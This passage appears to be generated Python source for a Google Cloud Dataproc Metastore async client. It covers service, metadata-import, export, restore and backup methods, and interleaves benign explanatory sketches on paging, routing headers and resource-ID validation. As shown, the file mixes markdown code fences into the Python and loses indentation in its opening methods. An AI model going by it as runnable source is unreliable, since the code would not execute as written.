# request, apply these.
if parent is not None:
request.parent = parent
if service is not None:
request.service = service
if service_id is not None:
request.service_id = service_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_service,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def update_service(
self,
request: Union[metastore.UpdateServiceRequest, dict] = None,
*,
service: metastore.Service = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates the parameters of a single service.
Args:
request (Union[google.cloud.metastore_v1.types.UpdateServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.UpdateService][google.cloud.metastore.v1.DataprocMetastore.UpdateService].
service (:class:`google.cloud.metastore_v1.types.Service`):
Required. The metastore service to update. The server
only merges fields in the service if they are specified
in ``update_mask``.
The metastore service's ``name`` field is used to
identify the metastore service to be updated.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Required. A field mask used to specify the fields to be
overwritten in the metastore service resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.UpdateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_service,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("service.name", request.service.name),)
),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response

    async def delete_service(
        self,
        request: Union[metastore.DeleteServiceRequest, dict] = None,
        *,
        name: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Deletes a single service.

        Args:
            request (Union[google.cloud.metastore_v1.types.DeleteServiceRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.DeleteService][google.cloud.metastore.v1.DataprocMetastore.DeleteService].
            name (:class:`str`):
                Required. The relative resource name of the metastore
                service to delete, in the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}``.

                This corresponds to the ``name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

                The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
                empty messages in your APIs. A typical example is to
                use it as the request or the response type of an API
                method. For instance:

                    service Foo {
                        rpc Bar(google.protobuf.Empty) returns
                        (google.protobuf.Empty);
                    }

                The JSON representation for Empty is empty JSON
                object {}.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([name])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.DeleteServiceRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if name is not None:
            request.name = name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.delete_service,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            empty_pb2.Empty,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response

    async def list_metadata_imports(
        self,
        request: Union[metastore.ListMetadataImportsRequest, dict] = None,
        *,
        parent: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> pagers.ListMetadataImportsAsyncPager:
        r"""Lists imports in a service.

        Args:
            request (Union[google.cloud.metastore_v1.types.ListMetadataImportsRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1.DataprocMetastore.ListMetadataImports].
            parent (:class:`str`):
                Required. The relative resource name of the service
                whose metadata imports to list, in the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports``.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.metastore_v1.services.dataproc_metastore.pagers.ListMetadataImportsAsyncPager:
                Response message for
                [DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1.DataprocMetastore.ListMetadataImports].

                Iterating over this object will yield results and
                resolve additional pages automatically.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.ListMetadataImportsRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if parent is not None:
            request.parent = parent

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.list_metadata_imports,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # This method is paged; wrap the response in a pager, which provides
        # an `__aiter__` convenience method.
        response = pagers.ListMetadataImportsAsyncPager(
            method=rpc, request=request, response=response, metadata=metadata,
        )

        # Done; return the response.
        return response
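# NOTE: The returned ListMetadataImportsAsyncPager is consumed with
# `async for`, which resolves further pages transparently. A minimal,
# self-contained sketch of that iteration contract follows; the
# `iterate_pages` generator is a stand-in for the real pager, not part
# of this library.

```python
import asyncio


async def iterate_pages(pages):
    # Yield individual items across successive "pages", awaiting between
    # pages the way the pager awaits the next ListMetadataImports RPC.
    for page in pages:
        await asyncio.sleep(0)  # stand-in for the next-page request
        for item in page:
            yield item


async def collect():
    pager = iterate_pages([["import-1", "import-2"], ["import-3"]])
    return [name async for name in pager]


print(asyncio.run(collect()))  # -> ['import-1', 'import-2', 'import-3']
```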

    async def get_metadata_import(
        self,
        request: Union[metastore.GetMetadataImportRequest, dict] = None,
        *,
        name: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> metastore.MetadataImport:
        r"""Gets details of a single import.

        Args:
            request (Union[google.cloud.metastore_v1.types.GetMetadataImportRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.GetMetadataImport][google.cloud.metastore.v1.DataprocMetastore.GetMetadataImport].
            name (:class:`str`):
                Required. The relative resource name of the metadata
                import to retrieve, in the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports/{import_id}``.

                This corresponds to the ``name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.metastore_v1.types.MetadataImport:
                A metastore resource that imports
                metadata.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([name])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.GetMetadataImportRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if name is not None:
            request.name = name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.get_metadata_import,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Done; return the response.
        return response

    async def create_metadata_import(
        self,
        request: Union[metastore.CreateMetadataImportRequest, dict] = None,
        *,
        parent: str = None,
        metadata_import: metastore.MetadataImport = None,
        metadata_import_id: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Creates a new MetadataImport in a given project and
        location.

        Args:
            request (Union[google.cloud.metastore_v1.types.CreateMetadataImportRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.CreateMetadataImport][google.cloud.metastore.v1.DataprocMetastore.CreateMetadataImport].
            parent (:class:`str`):
                Required. The relative resource name of the service in
                which to create a metastore import, in the following
                form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}``.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            metadata_import (:class:`google.cloud.metastore_v1.types.MetadataImport`):
                Required. The metadata import to create. The ``name``
                field is ignored. The ID of the created metadata import
                must be provided in the request's ``metadata_import_id``
                field.

                This corresponds to the ``metadata_import`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            metadata_import_id (:class:`str`):
                Required. The ID of the metadata
                import, which is used as the final
                component of the metadata import's name.
                This value must be between 1 and 64
                characters long, begin with a letter,
                end with a letter or number, and consist
                of alpha-numeric ASCII characters or
                hyphens.

                This corresponds to the ``metadata_import_id`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

                The result type for the operation will be
                :class:`google.cloud.metastore_v1.types.MetadataImport`
                A metastore resource that imports metadata.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent, metadata_import, metadata_import_id])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.CreateMetadataImportRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if parent is not None:
            request.parent = parent
        if metadata_import is not None:
            request.metadata_import = metadata_import
        if metadata_import_id is not None:
            request.metadata_import_id = metadata_import_id

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.create_metadata_import,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            metastore.MetadataImport,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response

    async def update_metadata_import(
        self,
        request: Union[metastore.UpdateMetadataImportRequest, dict] = None,
        *,
        metadata_import: metastore.MetadataImport = None,
        update_mask: field_mask_pb2.FieldMask = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Updates a single import.

        Only the description field of MetadataImport is
        supported to be updated.

        Args:
            request (Union[google.cloud.metastore_v1.types.UpdateMetadataImportRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.UpdateMetadataImport][google.cloud.metastore.v1.DataprocMetastore.UpdateMetadataImport].
            metadata_import (:class:`google.cloud.metastore_v1.types.MetadataImport`):
                Required. The metadata import to update. The server only
                merges fields in the import if they are specified in
                ``update_mask``.

                The metadata import's ``name`` field is used to identify
                the metastore import to be updated.

                This corresponds to the ``metadata_import`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
                Required. A field mask used to specify the fields to be
                overwritten in the metadata import resource by the
                update. Fields specified in the ``update_mask`` are
                relative to the resource (not to the full request). A
                field is overwritten if it is in the mask.

                This corresponds to the ``update_mask`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

                The result type for the operation will be
                :class:`google.cloud.metastore_v1.types.MetadataImport`
                A metastore resource that imports metadata.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([metadata_import, update_mask])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.UpdateMetadataImportRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if metadata_import is not None:
            request.metadata_import = metadata_import
        if update_mask is not None:
            request.update_mask = update_mask

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.update_metadata_import,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata(
                (("metadata_import.name", request.metadata_import.name),)
            ),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            metastore.MetadataImport,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response
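# NOTE: The routing-header step above packs resource fields such as
# `metadata_import.name` into the `x-goog-request-params` gRPC metadata
# entry. A simplified, illustrative analogue of what
# `gapic_v1.routing_header.to_grpc_metadata` produces follows; the real
# helper lives in `google.api_core`, so treat this only as a sketch.

```python
from urllib.parse import quote


def to_grpc_metadata_sketch(params):
    # Join (key, value) pairs into a single URL-encoded header value,
    # mirroring the shape of google.api_core's routing-header helper.
    value = "&".join(f"{key}={quote(str(val), safe='')}" for key, val in params)
    return ("x-goog-request-params", value)


header = to_grpc_metadata_sketch(
    (
        (
            "metadata_import.name",
            "projects/p/locations/l/services/s/metadataImports/m",
        ),
    )
)
print(header[0])  # x-goog-request-params
```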

    async def export_metadata(
        self,
        request: Union[metastore.ExportMetadataRequest, dict] = None,
        *,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Exports metadata from a service.

        Args:
            request (Union[google.cloud.metastore_v1.types.ExportMetadataRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.ExportMetadata][google.cloud.metastore.v1.DataprocMetastore.ExportMetadata].
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

                The result type for the operation will be
                :class:`google.cloud.metastore_v1.types.MetadataExport`
                The details of a metadata export operation.

        """
        # Create or coerce a protobuf request object.
        request = metastore.ExportMetadataRequest(request)

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.export_metadata,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            metastore.MetadataExport,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response

    async def restore_service(
        self,
        request: Union[metastore.RestoreServiceRequest, dict] = None,
        *,
        service: str = None,
        backup: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Restores a service from a backup.

        Args:
            request (Union[google.cloud.metastore_v1.types.RestoreServiceRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.Restore][].
            service (:class:`str`):
                Required. The relative resource name of the metastore
                service to run restore, in the following form:

                ``projects/{project_id}/locations/{location_id}/services/{service_id}``.

                This corresponds to the ``service`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            backup (:class:`str`):
                Required. The relative resource name of the metastore
                service backup to restore from, in the following form:

                ``projects/{project_id}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.

                This corresponds to the ``backup`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

                The result type for the operation will be
                :class:`google.cloud.metastore_v1.types.Restore` The
                details of a metadata restore operation.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([service, backup])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.RestoreServiceRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if service is not None:
            request.service = service
        if backup is not None:
            request.backup = backup

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.restore_service,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            metastore.Restore,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response

    async def list_backups(
        self,
        request: Union[metastore.ListBackupsRequest, dict] = None,
        *,
        parent: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> pagers.ListBackupsAsyncPager:
        r"""Lists backups in a service.

        Args:
            request (Union[google.cloud.metastore_v1.types.ListBackupsRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.ListBackups][google.cloud.metastore.v1.DataprocMetastore.ListBackups].
            parent (:class:`str`):
                Required. The relative resource name of the service
                whose backups to list, in the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}/backups``.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.metastore_v1.services.dataproc_metastore.pagers.ListBackupsAsyncPager:
                Response message for
                [DataprocMetastore.ListBackups][google.cloud.metastore.v1.DataprocMetastore.ListBackups].

                Iterating over this object will yield results and
                resolve additional pages automatically.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.ListBackupsRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if parent is not None:
            request.parent = parent

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.list_backups,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # This method is paged; wrap the response in a pager, which provides
        # an `__aiter__` convenience method.
        response = pagers.ListBackupsAsyncPager(
            method=rpc, request=request, response=response, metadata=metadata,
        )

        # Done; return the response.
        return response

    async def get_backup(
        self,
        request: Union[metastore.GetBackupRequest, dict] = None,
        *,
        name: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> metastore.Backup:
        r"""Gets details of a single backup.

        Args:
            request (Union[google.cloud.metastore_v1.types.GetBackupRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.GetBackup][google.cloud.metastore.v1.DataprocMetastore.GetBackup].
            name (:class:`str`):
                Required. The relative resource name of the backup to
                retrieve, in the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.

                This corresponds to the ``name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.metastore_v1.types.Backup:
                The details of a backup resource.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([name])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.GetBackupRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if name is not None:
            request.name = name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.get_backup,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Done; return the response.
        return response

    async def create_backup(
        self,
        request: Union[metastore.CreateBackupRequest, dict] = None,
        *,
        parent: str = None,
        backup: metastore.Backup = None,
        backup_id: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Creates a new backup in a given project and location.

        Args:
            request (Union[google.cloud.metastore_v1.types.CreateBackupRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.CreateBackup][google.cloud.metastore.v1.DataprocMetastore.CreateBackup].
            parent (:class:`str`):
                Required. The relative resource name of the service in
                which to create a backup of the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}``.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            backup (:class:`google.cloud.metastore_v1.types.Backup`):
                Required. The backup to create. The ``name`` field is
                ignored. The ID of the created backup must be provided
                in the request's ``backup_id`` field.

                This corresponds to the ``backup`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            backup_id (:class:`str`):
                Required. The ID of the backup, which
                is used as the final component of the
                backup's name.
                This value must be between 1 and 64
                characters long, begin with a letter,
                end with a letter or number, and consist
                of alpha-numeric ASCII characters or
                hyphens.

                This corresponds to the ``backup_id`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

                The result type for the operation will be
                :class:`google.cloud.metastore_v1.types.Backup` The
                details of a backup resource.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent, backup, backup_id])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = metastore.CreateBackupRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if parent is not None:
            request.parent = parent
        if backup is not None:
            request.backup = backup
        if backup_id is not None:
            request.backup_id = backup_id

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.create_backup,
            default_timeout=60.0,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Wrap the response in an operation future.
        response = operation_async.from_gapic(
            response,
            self._client._transport.operations_client,
            metastore.Backup,
            metadata_type=metastore.OperationMetadata,
        )

        # Done; return the response.
        return response
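# NOTE: `backup_id` (like `metadata_import_id` above) must be between 1
# and 64 characters, begin with a letter, end with a letter or number,
# and consist of alphanumeric ASCII characters or hyphens. A client-side
# pre-check for that documented rule could look like the sketch below;
# the server performs the authoritative validation, and this regex is
# only one reading of the constraint.

```python
import re

# 1-64 chars: a leading letter, optionally followed by up to 62
# letters/digits/hyphens and a trailing letter or digit.
_RESOURCE_ID = re.compile(r"^[A-Za-z](?:[A-Za-z0-9-]{0,62}[A-Za-z0-9])?$")


def is_valid_resource_id(candidate: str) -> bool:
    """Return True if `candidate` satisfies the documented ID rule."""
    return bool(_RESOURCE_ID.match(candidate))


print(is_valid_resource_id("nightly-backup-01"))   # True
print(is_valid_resource_id("1-starts-with-digit"))  # False
print(is_valid_resource_id("ends-with-hyphen-"))    # False
```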

    async def delete_backup(
        self,
        request: Union[metastore.DeleteBackupRequest, dict] = None,
        *,
        name: str = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> operation_async.AsyncOperation:
        r"""Deletes a single backup.

        Args:
            request (Union[google.cloud.metastore_v1.types.DeleteBackupRequest, dict]):
                The request object. Request message for
                [DataprocMetastore.DeleteBackup][google.cloud.metastore.v1.DataprocMetastore.DeleteBackup].
            name (:class:`str`):
                Required. The relative resource name of the backup to
                delete, in the following form:

                ``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.

                This corresponds to the ``name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.api_core.operation_async.AsyncOperation:
                An object representing a long-running operation.

